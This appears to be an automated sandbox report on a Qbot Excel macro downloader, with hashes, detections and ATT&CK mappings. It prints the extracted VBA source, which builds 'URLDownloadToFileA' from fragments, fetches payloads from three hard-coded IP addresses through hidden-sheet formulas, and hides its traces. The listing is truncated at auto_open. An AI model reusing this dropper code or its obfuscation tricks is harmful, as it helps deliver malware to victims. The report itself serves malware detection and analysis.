Qbot Office (OLE) malware analysis — malicious · c7e1cf54edf4f251

MALICIOUS

Office (OLE)

582.0 KB Created: 2015-06-05 18:17:20 Authoring application: Microsoft Excel First seen: 2021-11-20

MD5: 61767e1cb0b286c0da3fa6bd97a8313e SHA-1: 11bd3dcc842cfd44f88bc7e461338ec371e278b4 SHA-256: c7e1cf54edf4f2510a72019631610ff25a3fc7dd0648e0acabaf0bd31d3272ee

120 Risk Score

Malware Insights

Qbot · confidence 95%

MITRE ATT&CK

T1566.001 Spearphishing Attachment T1059.005 Visual Basic

The file is identified as malicious by ClamAV with the signature 'Xls.Downloader.Qbot-b760f03263b7c21b-9950248-0', strongly suggesting it belongs to the Qbot family. The presence of an Auto_Open VBA macro indicates that the malicious code will execute automatically upon opening the document, likely to download and execute a secondary payload. The VBA macro itself is heavily obfuscated and truncated, preventing a detailed analysis of its specific actions beyond its auto-execution trigger.

Heuristics 3

ClamAV: Xls.Downloader.Qbot-b760f03263b7c21b-9950248-0 critical CLAMAV_DETECTION

ClamAV detected this file as malware: Xls.Downloader.Qbot-b760f03263b7c21b-9950248-0
VBA macros detected medium 1 related finding OLE_VBA_MACROS

Document contains VBA macro code
Auto_Open macro high OLE_VBA_AUTO

Auto_Open macro

Extracted artifacts 1

Files carved from inside the sample during analysis.

Filename Kind Source Size

macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 6356 bytes

Filename	Kind	Source	Size
`macros.bas`	vba-macro	oletools.olevba.extract_macros (decoded VBA source)	6356 bytes
SHA-256: `5a1bec0ff40495f6baf830ac55f3a751a709d970905bf82cecc0a57cdaad37d3`
Preview script First 1,000 lines of the extracted script Attribute VB_Name = "ThisWorkbook" Attribute VB_Base = "0{00020819-0000-0000-C000-000000000046}" Attribute VB_GlobalNameSpace = False Attribute VB_Creatable = False Attribute VB_PredeclaredId = True Attribute VB_Exposed = True Attribute VB_TemplateDerived = False Attribute VB_Customizable = True Option Explicit Private m_openAlreadyRan As Boolean Private m_isOpenDelayed As Boolean Public Sub applyLogosToDashboard() Application.ScreenUpdating = False If Not Application.OperatingSystem Like "Mac" Then Sheets("Dashboard").Activate Sheets("Dashboard").Unprotect Password:=Sheets("Logos").Range("IV1") ActiveSheet.Shapes("Apple_Logo").Visible = False ActiveSheet.Shapes("Win_Logo").Visible = True ActiveSheet.Shapes("Button_Insert_Logo").Visible = True ActiveSheet.Shapes("Button_Print_PDF").Visible = True ActiveSheet.Shapes("Button_Save_As").Visible = True ActiveSheet.Shapes("Button_Help").Visible = True ActiveSheet.Shapes("Button_Versions").Visible = True Sheets("Logos").Protect Password:=Sheets("Dashboard").Range("IV1"), DrawingObjects:=True, Contents:=True, Scenarios:=True Else Sheets("Dashboard").Activate Sheets("Dashboard").Unprotect Password:=Sheets("Dashboard").Range("IV1") ActiveSheet.Shapes("Apple_Logo").Visible = True ActiveSheet.Shapes("Win_Logo").Visible = False ActiveSheet.Shapes("Button_Insert_Logo").Visible = False ActiveSheet.Shapes("Button_Print_PDF").Visible = False ActiveSheet.Shapes("Button_Save_As").Visible = False Sheets("Dashboard").Protect Password:=Sheets("Dashboard").Range("IV1"), DrawingObjects:=True, Contents:=True, Scenarios:=True End If Application.ScreenUpdating = True End Sub Private Sub InitWorkbook() If VBA.Val(Application.Version) < 12 Then MsgBox "This Workbook requires Excel 2007 or later!", vbCritical, "Closing" Me.Close False Exit Sub End If ' With New frmMain .Show 'Other code ' ' ' End With End Sub Private Sub Workbook_BeforeClose(Cancel As Boolean) On Error Resume Next Application.DisplayAlerts = False Sheets("Nneeri").Delete Application.DisplayAlerts = True End Sub Attribute VB_Name = "Sheet1" Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}" Attribute VB_GlobalNameSpace = False Attribute VB_Creatable = False Attribute VB_PredeclaredId = True Attribute VB_Exposed = True Attribute VB_TemplateDerived = False Attribute VB_Customizable = True Attribute VB_Name = "Module1" Function Hrosters() Sheets("Nneeri").Range("H10") = "=Kopast(0,H24&K17&K18,G10,0,0)" Sheets("Nneeri").Range("H11") = "=Kopast(0,H25&K17&K18,G11,0,0)" Sheets("Nneeri").Range("H12") = "=Kopast(0,H26&K17&K18,G12,0,0)" End Function Attribute VB_Name = "Module2" Function Retio() net = "uR" net1 = "Mon" dff = "URLDownload" dff1 = "ToFileA" Diopaster Sheets("Nneeri").Range("I9") = net & "l" & net1 Sheets("Nneeri").Range("K18") = ".dat" Sheets("Nneeri").Range("K17") = "=NOW()" Sheets("Nneeri").Range("H35") = "=HALT()" Sheets("Nneeri").Range("I10") = dff & dff1 kjhkjlkj End Function Attribute VB_Name = "Module3" Function Diopaster() Application.ScreenUpdating = False Biolaster Sheets("Nneeri").Range("I12") = "Kopast" Sheets("Nneeri").Visible = False Nyrtyfh dfgdf End Function Function Nyrtyfh() Sheets("Nneeri").Range("G10") = "..\Lifas.ver" Sheets("Nneeri").Range("G11") = "..\Lifas.ver1" Sheets("Nneeri").Range("G12") = "..\Lifas.ver2" End Function Attribute VB_Name = "Module4" Function dfgdf() dgdgerwrh = "http://" Sheets("Nneeri").Range("H24") = dgdgerwrh & "111.90.150.195/" Sheets("Nneeri").Range("H25") = dgdgerwrh & "185.106.120.116/" Sheets("Nneeri").Range("H26") = dgdgerwrh & "51.89.115.115/" Sheets("Nneeri").Range("A1:M100").Interior.Color = vbBlack End Function Attribute VB_Name = "Module6" Sub auto_open() Set ... (truncated)

SHA-256: 5a1bec0ff40495f6baf830ac55f3a751a709d970905bf82cecc0a57cdaad37d3

Preview script

First 1,000 lines of the extracted script

Attribute VB_Name = "ThisWorkbook"
Attribute VB_Base = "0{00020819-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True
Option Explicit

Private m_openAlreadyRan As Boolean
Private m_isOpenDelayed As Boolean
Public Sub applyLogosToDashboard()

Application.ScreenUpdating = False

If Not Application.OperatingSystem Like "*Mac*" Then

    Sheets("Dashboard").Activate
    Sheets("Dashboard").Unprotect Password:=Sheets("Logos").Range("IV1")
    ActiveSheet.Shapes("Apple_Logo").Visible = False
    ActiveSheet.Shapes("Win_Logo").Visible = True
    ActiveSheet.Shapes("Button_Insert_Logo").Visible = True
    ActiveSheet.Shapes("Button_Print_PDF").Visible = True
    ActiveSheet.Shapes("Button_Save_As").Visible = True
    ActiveSheet.Shapes("Button_Help").Visible = True
    ActiveSheet.Shapes("Button_Versions").Visible = True
    Sheets("Logos").Protect Password:=Sheets("Dashboard").Range("IV1"), DrawingObjects:=True, Contents:=True, Scenarios:=True

Else

    Sheets("Dashboard").Activate
    Sheets("Dashboard").Unprotect Password:=Sheets("Dashboard").Range("IV1")
    ActiveSheet.Shapes("Apple_Logo").Visible = True
    ActiveSheet.Shapes("Win_Logo").Visible = False
    ActiveSheet.Shapes("Button_Insert_Logo").Visible = False
    ActiveSheet.Shapes("Button_Print_PDF").Visible = False
    ActiveSheet.Shapes("Button_Save_As").Visible = False
    Sheets("Dashboard").Protect Password:=Sheets("Dashboard").Range("IV1"), DrawingObjects:=True, Contents:=True, Scenarios:=True

End If

    Application.ScreenUpdating = True

End Sub



Private Sub InitWorkbook()
    If VBA.Val(Application.Version) < 12 Then
        MsgBox "This Workbook requires Excel 2007 or later!", vbCritical, "Closing"
        Me.Close False
        Exit Sub
    End If
    '
    With New frmMain
        .Show
        'Other code
        '
        '
        '
    End With
End Sub

Private Sub Workbook_BeforeClose(Cancel As Boolean)


On Error Resume Next
   Application.DisplayAlerts = False
   Sheets("Nneeri").Delete
   Application.DisplayAlerts = True
End Sub

Attribute VB_Name = "Sheet1"
Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True

Attribute VB_Name = "Module1"

Function Hrosters()



Sheets("Nneeri").Range("H10") = "=Kopast(0,H24&K17&K18,G10,0,0)"
Sheets("Nneeri").Range("H11") = "=Kopast(0,H25&K17&K18,G11,0,0)"
Sheets("Nneeri").Range("H12") = "=Kopast(0,H26&K17&K18,G12,0,0)"

End Function

 

Attribute VB_Name = "Module2"
Function Retio()

net = "uR"
net1 = "Mon"
dff = "URLDownload"
dff1 = "ToFileA"
Diopaster

Sheets("Nneeri").Range("I9") = net & "l" & net1
Sheets("Nneeri").Range("K18") = ".dat"


Sheets("Nneeri").Range("K17") = "=NOW()"
Sheets("Nneeri").Range("H35") = "=HALT()"
Sheets("Nneeri").Range("I10") = dff & dff1

kjhkjlkj



End Function





Attribute VB_Name = "Module3"

Function Diopaster()
Application.ScreenUpdating = False
Biolaster
Sheets("Nneeri").Range("I12") = "Kopast"

Sheets("Nneeri").Visible = False
Nyrtyfh
dfgdf
End Function


Function Nyrtyfh()

Sheets("Nneeri").Range("G10") = "..\Lifas.ver"
Sheets("Nneeri").Range("G11") = "..\Lifas.ver1"
Sheets("Nneeri").Range("G12") = "..\Lifas.ver2"

End Function


Attribute VB_Name = "Module4"




Function dfgdf()

dgdgerwrh = "http://"

Sheets("Nneeri").Range("H24") = dgdgerwrh & "111.90.150.195/"
Sheets("Nneeri").Range("H25") = dgdgerwrh & "185.106.120.116/"
Sheets("Nneeri").Range("H26") = dgdgerwrh & "51.89.115.115/"
Sheets("Nneeri").Range("A1:M100").Interior.Color = vbBlack

End Function









Attribute VB_Name = "Module6"






Sub auto_open()
Set 
... (truncated)

Open this report in the interactive analyzer, or submit your own file for analysis.